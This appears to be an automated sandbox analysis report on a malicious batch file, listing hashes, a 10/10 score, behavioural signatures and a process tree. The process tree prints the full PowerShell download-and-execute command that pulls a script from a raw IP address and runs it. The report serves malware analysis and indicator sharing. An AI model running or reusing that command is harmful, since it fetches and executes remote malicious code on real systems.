Analysis
-
max time kernel
106s -
max time network
108s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
24-03-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
w7MPmXqT.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
w7MPmXqT.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
w7MPmXqT.bat
-
Size
196B
-
MD5
f27899524a4ad3e77954797a979ba0d8
-
SHA1
281223c4cf1338fa2f2ea469ea8e6f0246b5adb0
-
SHA256
359a07b1df7b142cfd37af0d9cdbc28ace2ca7ffc9bd778fde48bfa501a69d79
-
SHA512
2bf71ad0387cf7c0b48dca5dc95c403fa2bb7539e155505e8f740f5f991cbb4c266bf0bc790a16a4915f7c72bad871ac437f08c19ee918b2386086409a87e97d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/w7MPmXqT
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3100 3956 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3100 WerFault.exe Token: SeBackupPrivilege 3100 WerFault.exe Token: SeDebugPrivilege 3100 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe 3100 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\w7MPmXqT.bat"1⤵PID:4052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/w7MPmXqT');Invoke-SZOMRMAUGUIDZ;Start-Sleep -s 10000"2⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3100